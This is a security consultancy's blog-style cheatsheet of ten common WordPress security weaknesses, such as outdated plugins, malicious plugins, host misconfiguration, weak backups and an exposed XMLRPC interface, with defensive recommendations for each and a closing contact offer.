WordPress Security Cheatsheet

Over the years, Cloud Security Partners has offered a wide range of security consultancy services. One unfortunate responsibility we frequently handle is incident response. This response work often takes place in custom applications, but we also carry out these tasks on WordPress installations regularly. These incidents can vary widely in scope. Some incidents involve custom-built applications, and we have seen a significant portion involve compromised WordPress installations. WordPress remains a common target for attackers due to its widespread use and frequent misconfigurations.

WordPress is a popular Content Management System (CMS) that makes it easier to create and manage websites. It becomes quicker and easier to create a blog or website to share with the world. However, WordPress can be quite complex and, for those not familiar with web technologies and system administration, it may present challenges and security risks.

Below is a sample of common WordPress issues that we run into. This list is not exhaustive, but rather a primer to help you get started with better security and security practices from the outset.

1. Outdated WordPress 

Like many CMSs or WYSIWYG solutions, WordPress is quite complex. At the time of writing, a fresh install comes with over 924 thousand lines of code. As such, weaknesses are discovered all the time, not because of intentional action but because of the complexity of WordPress. Every year, multiple CVEs are identified within various versions of WordPress. Failing to pay attention to the WordPress installation and maintain the installed version can allow known vulnerabilities to persist.

One should regularly check the installed version of WordPress and, should the version be outdated, perform an upgrade. This should be expedited if the patch includes security fixes, especially for a Common Vulnerability and Exposure (CVE) entry. Be cautious when performing regular backups prior to upgrading (see number 8: Improper Backup Strategy).

2. Outdated or Unsupported Plugins

Many WordPress installations utilize third-party plugins to enhance the functionality of their websites. Just as with WordPress installations, these should be checked frequently for updates. However, these plugins may also provide another risk: end of support. It is not unusual for plugins to remain unsupported for extended periods. This period may come with an official announcement or may be silent as the developer simply moves on without a word of warning. When updating and validating plugin versions, it is important to pay attention to the date of release. Depending on the plugin and the functionality provided, it may be worth migrating away from plugins that have gone without an update for a long period of time.

3. Malicious Plugins

A general problem with any application is the risk of malicious libraries and plugins. With an ecosystem as large as WordPress, it is extremely tempting to create malicious plugins to attempt to compromise WordPress installations. Even if a small percentage of developers fall for such a ruse, the sheer number of WordPress installations means that thousands of servers, if not more, could be at risk. Such compromised hosts could lose their data, including user accounts, may be an outlet to attack website users, or may become part of a botnet cluster. With arbitrary code running on the host, there are many potential uses for malicious actors.

Try to look for plugins from reputable developers. Malicious plugins could end up on reputable websites, so do not simply rely on the website hosting the plugin - vet the developer as well. Additionally, perform malware scans of potential plugins before installing them. If you or someone else is familiar with PHP code, it would even be worth inspecting the plugin source code for fishy behavior, such as making calls to remote servers via Curl or running operating system shell commands with functions like system(). 

4. Missing Security Plugins

With the complexity of evolving attacks and outdated dependencies, several plugins have been developed to help WordPress developers mitigate these issues. Such plugins, such as WordFence, act as a mix of plugin scanners, malware scanners, and web application firewalls. Utilizing plugins like these adds an extra layer to a robust defense strategy.

A few key areas to highlight would be: anti-automation (e.g., CAPTCHAs), account timeouts to prevent bruteforcing logins, and malware scanning. If one wanted to take this beyond WordPress plugins, one could consider placing their WordPress website behind a service such as CloudFlare for an additional layer of protection.

5. Not Regularly Scanning the Installation

Various tools such as WPScan exist and can be used to assess the WordPress installation from an outsider point of view. WPScan will attempt to identify installed plugins and the WordPress version in use. Using that information, it will then try to determine if known vulnerabilities exist within the versions identified.

This strongly mimics what malicious actors will do. If you examine your web access logs, you will likely find a significant amount of traffic attempting to fingerprint the WordPress version, as well as interact with various known endpoints within WordPress, such as the login page. While checking for updates and letting security plugins identify potential issues, the WPScan utility will add another layer of security testing into the mix. Additionally, the WPScan team maintains a database of known vulnerabilities within WordPress and popular plugins. Not leaning on such resources is a major mistake.

6. Host Misconfiguration

Some WordPress installations are hosted by dedicated companies. Other installations are self-hosted on virtual machines somewhere in the cloud, like AWS. While this is a valid strategy, it comes at the cost of managing one’s own environment. 

If one is not well-versed in system administration, they may make mistakes that are easily avoided. For example, they may follow a guide and make the database public facing. As another example, they may attempt to run the webserver as root or grant world read, write, and execute permissions. Additionally, WordPress relies on custom routing via .htaccess files. Tampering with these files or blindly inserting such files into directories may alter the WordPress installation’s behavior.

How the web server is accessed can be a potential attack vector as well. SSH is commonly used by tech-savvy users, but it is very common for FTP and even PHPMyAdmin to be used. These provide an increased surface area or even a direct connection to a sensitive database, in the case of PHPMyAdmin. These services need to be configured correctly and securely, and the credentials used to access them must be strong as well.

While this list primarily focuses on WordPress, it is worth noting that some issues can be caused by poor system administration practices. As another example…

7. Weak Isolation for Shared Hosts

Sometimes, multiple installations of WordPress are installed and hosted on a single server. While it is tempting to utilize the same process, operating system user, and folders, this increases the surface area of attack in the event of a WordPress compromise. For example, WordPress Install 1 (WPI1) is compromised and, because of the shared hosting, WordPress Install 2 (WPI2) and all of its files are now at risk as well. 

This may not be common with individual websites, especially where modern WordPress permits multitenancy, but hosting providers sometimes incorrectly host the websites of their customers. In the event that one customer’s website is compromised, potentially all other customers of the hosting provider will be at risk. This is a reality that we at Cloud Security Partners have seen multiple times, though it is not unique to WordPress alone.

Appropriate isolation practices should be utilized to ensure that compromising one WordPress installation does not compromise others. This could include container isolation, ensuring each installation runs with different services, ensuring no shared database access, and each installation runs as separate users. As much isolation should be granted as possible as even world-readible files on a shared host could be abused by an attacker or even a malicious customer.

8. Improper Backup Strategy

While not fun to plan for, the reality of web hosting is that things can and, sometimes, do go wrong. Whether the website is compromised and taken down, or a bad update breaks the website entirely, there is always the potential for your WordPress website to no longer be served. In order to recover, there needs to be a solid backup strategy in place to ensure that any potential downtime is minimal. The worst-case scenario is that a website is compromised, deleted, and no working backup is present anywhere.

Backups should be taken at regular intervals. This should include both the WordPress application, the plugins, and a database dump. Additionally, these files should be restored occasionally to ensure that the backup was taken successfully. A true tragedy would occur when one attempts to recover with a backup, only to find that a file is corrupt and unusable. 

9. XMLRPC Enabled

WordPress provides an XMLRPC interface, which permits other web applications to automate portions of WordPress. In some unique instances, this may be a desirable feature. In most instances, all it does is provide an increased attack surface. This interface may be used for bruteforcing logins, or vulnerabilities may be discovered that are unique to XMLRPC, like CVE-2020-28036. 

If this interface is not needed, it would be best to disable it. 

10. Poor Application Security in Custom Plugins/Themes

This point is a large one, and we won’t go into full details here as there is simply too much to cover. When designing custom plugins and themes for WordPress, security within that functionality becomes your problem to solve. As such, being aware of authentication, authorization, SQL Injection, Cross-Site Scripting, malicious file upload, and other security issues is a must.

We recommend being aware of the OWASP Top 10, which documents the vulnerability classes frequently seen, and we also recommend going through WordPress’s recommendations for plugin development found here: https://learn.wordpress.org/tutorial/introduction-to-securely-developing-plugins/.

If you need help securing your WordPress installation, we can help! Contact us and we get help you secure your environment today.

contact@cloudsecuritypartners.com